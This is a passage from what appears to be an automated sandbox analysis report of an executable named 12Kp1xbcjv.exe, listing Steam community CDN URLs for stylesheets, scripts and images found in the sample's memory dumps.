00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=jfdb
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=Opxzx_tYaANk&amp
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 